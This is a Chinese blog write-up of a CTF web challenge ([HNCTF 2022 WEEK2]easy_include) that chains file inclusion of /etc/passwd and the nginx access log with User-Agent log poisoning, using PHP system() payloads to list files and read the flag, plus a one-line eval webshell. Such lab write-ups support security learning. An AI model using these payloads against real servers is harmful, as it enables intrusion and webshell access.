[HNCTF 2022 WEEK2]easy_include

于 2024-09-07 10:59:46 发布
阅读量515 收藏 6
点赞数 5
分类专栏: CTF比赛WP 文章标签: CTF 网络安全 经验分享 笔记 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141992555
版权

开启NSSCTF靶场,打开链接:

可以看到过滤了很多常见的利用协议,GET传参是file

先随便读取点正常的文件吧,构造payload:

/?file=/etc/passwd

可以看到是nginx服务器还有日志文件信息

apache服务器日志存放文件位置:/var/log/apache/access.log

nginx服务器日志存放位置:/var/log/nginx/access.log和/var/log/nginx/error.log

直接构造payload:

/?file=/var/log/nginx/access.log

显示的内容是浏览器和部分系统的信息,这些都是User-Agent头的内容,猜测可以修改User-Agent头的内容来执行命令

用burp抓包,修改User-Agent头的内容为:

<?php system('ls /');?>

显示出一堆文件,其中ffflllaaaggg是我们需要的

还是修改User-Agent头的内容为:

<?php system('cat /ffflllaaaggg');?>或<?php system('cat /f*');?>

得到flag:

NSSCTF{964e6b5b-3652-441a-ad3a-142a851a7804}

看到有文章说上传一句话木马也可以,就试了试:

<?php @eval($_POST['pass'];?)>

但是用中国蚁剑连接却显示返回数据为空?

南暮思鸢
关注
专栏目录
[HNCTF 2022 WEEK2]easy_unser - 反序列化(wakeup绕过&目录绕过)
oZuoShen123的博客
10-07 987
2、起始:body(__construct)、终点:body(__destruct),中间需要绕过__wakeup()1、题目干扰字符太多了,其实简化之后的代码差不多这样。
【Android-Calender】DAY_OF_WEEK与DAY_OF_WEEK_IN_MONTH
dandelionela的博客
12-06 1366
1. 比较Calendar.DAY_OF_WEEK与Calendar.DAY_OF_WEEK_IN_MONTH 根据文档: int DAY_OF_WEEK Field number forgetandsetindicating the day of the week. int DAY_OF_WEEK_IN_MONTH Field number ...
NSS [HNCTF 2022 WEEK2]easy_include
Jay17的博客
07-05 648
NSS [HNCTF 2022 WEEK2]easy_include
NSSCTF-Web题目27(Nginx漏洞、php伪协议、php解析绕过)
最新发布
weixin_54055099的博客
08-01 938
nginx漏洞、php伪协议、php非法传参
[HNCTF 2022 WEEK2]easy_include(Nginx日志)
weixin_74020633的博客
03-14 513
通过访问日志可以得到一些信息,比如ip地址,请求处理时间的信息,错误信息等,在我查了一些资料后发现,Nginx日志有两种,一种是access.log,一种是error.log。两种日志中的信息不同,access.log中的信息是一些ip地址,浏览器的信息,称作访问日志;经过这几天的做题,开始习惯查看网页请求头了,这题又接触了一个陌生的东西,Nginx日志;error.log称为错误日志,也就是说里面是一些错误访问的信息,可以帮助修改错误。看看这题吧,禁用了php和一些符号,就不知道该怎么入手了。
[HNCTF 2022 WEEK2]easy_include 文件包含遇上nginx
m0_64180167的博客
10-31 626
看了看就是会解析php 所以直接传递参数即可传递一个phpinfo。这个确实确实确实确实没想到 可以可以 又学到一个东西。存在文件包含漏洞 过滤 data 等常见利用协议。成功执行 那么就直接开始吧 直接穿命令。发现存在一个文件日志包含漏洞。这道纯粹记录 完全没想到。然后我们看看能读取啥东西。
week2day2
02-18
"week2day2"可能是一个学习计划或课程的一部分,意在深入探讨HTML的相关主题。在这个阶段,我们可能会涵盖以下几个关键知识点: 1. HTML基本结构:HTML文档通常以`<!DOCTYPE html>`开头,声明文档类型。接着是`...
Week_2_One_Piece_at_a_Time_Daan.ipynb
09-15
Week_2_One_Piece_at_a_Time_Daan.ipynb
HGAME 2022 week1 个人部分WP
qazwsxeb的博客
02-10 3783
寒假期间,小萌新在家瞎搞CTF,也是第一次参加HGAME,整体来说题目是简单的,但对于我这个萌新菜鸟来说,还是一头雾水,只会做一些简单的密码题,week1的web和misc还能做出几题,后面几周就完全不会了,二进制完全看不懂。。。已经坐牢有一段时间了,想想还是不要浪费时间,记录下这次比赛,也是一种学习。 本人还是个萌新,WP可能会存在很多错误,望各位大佬勿喷,也请多多指正。 web Tetris plus 描述:据说没人能超过 3000 分。要是做题做累了,就来玩玩小游戏吧(x 这道题很明显是玩游
[HNCTF 2022 WEEK2]easy_include 日志包含漏洞
qq_75120258的博客
03-21 981
​ 日志包含漏洞属于是本地文件包含,同样服务器没有很好的过滤,或者是服务器配置不当导致用户进入了内网,本来常规用户是访问不了这些文件的,但由于发起访问请求的人是服务器本身,也就导致用户任意文件读取。例如:某php文件存在本地文件包含漏洞,但无法上传文件,利用包含漏洞包含Apache(看服务器是Apache还是nginx)日志文件也可以获取WebShell。 ​
[HNCTF 2022 WEEK2]easy_unser
weixin_62306641的博客
11-23 584
因为有个私有变量,所以要url编码,有个_wakeup(),改一下数目。打开发现源码,是反序列化,Url编码之后再改。
2022HNCTF-web
bossDDYY的博客
10-30 3328
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3573
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 819
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
反序列化(三)
qq_43520778的博客
09-04 192
[toc]@反序列化。
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2253
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
刷题学习记录
qq_73861475的博客
12-20 1042
题目源码由源代码可知,当 mode=eval 时,若 shell 无值,则执行phpinfo();,若有值则经过滤后执行shell值的代码;file有值时经过滤后进行文件包含。所以攻击点有两个,一个是变量 shell 的 RCE ,一个是 file 的文件包含,由于 shell 变量需要经过filter($shell) | checkNums($shell),限制太多,想要通过 RCE 得到 flag 几乎无从下手,于是我们考虑从file寻找攻击点。
[HNCTF 2022 WEEK2]ez_ssrf
07-27
\[HNCTF 2022 WEEK2\]ez_ssrf是一个题目或挑战的名称,它涉及到SSRF(Server-Side Request Forgery)攻击。在这个挑战中,通过构造恶意的请求,攻击者可以利用目标服务器发起未经授权的请求,可能导致信息泄露、远程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值